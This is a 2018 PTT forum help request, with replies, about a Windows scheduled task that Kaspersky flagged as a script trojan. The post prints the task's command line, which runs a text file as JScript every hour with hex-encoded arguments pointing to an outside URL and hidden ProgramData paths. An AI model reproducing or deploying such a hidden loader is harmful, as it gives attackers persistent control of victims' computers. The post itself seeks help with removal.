作者joexx12 ((X ̄X)uu...)
看板AntiVirus
標題[問題] Yahoo! Powered donid廣告程式?
時間Wed Aug 29 12:36:22 2018
最近換了Kaspersky 2019 free後
剛剛電腦 卡巴跳出一個訊息
偵測到惡意程式
HEUR:Trojan.Script.Generic
位置C:\Windows\System32\Tasks\Yahoo! Powered donid
我檢查了我的工作排程
裡面有個Yahoo! Powered donid
每隔一小時會執行一次
內容為
"C:\ProgramData\{8C024961-0640-C3A7-8086-5DE51AC4D62B}\rola.txt"
"687474703a2f2f7761676e672e636f6d"
"433a5c50726f6772616d446174615c7b38433032343936312d303634302d433341372d383038362d3544453531414334443632427d5c636972697369"
"433a5c50726f6772616d446174615c7b38433032343936312d303634302d433341372d383038362d3544453531414334443632427d5c63657461726f74"
"//B" "//E:jscript" "--IsErIk"
不知道這是廣告程式還是惡意程式呢
有人有遇過嗎?
--
※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 223.141.1.72
※ 文章網址: https://www.ptt.cc/bbs/AntiVirus/M.1535517385.A.87A.html
推 DINJIAPC: 上寫的幾個路境的檔案一併殺一殺阿,你還要等第二個中標 08/29 15:38
→ DINJIAPC: 的共商心得是嗎 08/29 15:38
→ DINJIAPC: 名稱就寫木馬了 有廣告或工具取向的pup你還不是要在殺 08/29 15:40
→ joexx12: 刪除是一定刪除的 只是想討論 因為不知道怎發生的 所以才 08/29 20:01
→ joexx12: 上來問問有沒有人遇過 08/29 20:01
→ DINJIAPC: 把frst的log跑來在說 08/29 21:08
推 DINJIAPC: 不知道怎發生的? 難不成我知道嗎 ?紀錄沒跑出來誰會知 08/30 20:26
→ DINJIAPC: 道你電腦啥狀況,那你會不會哪天兒子抱錯了也不知道 08/30 20:27
→ DINJIAPC: overy-scan-tool/ 紀錄跑出來 08/30 20:45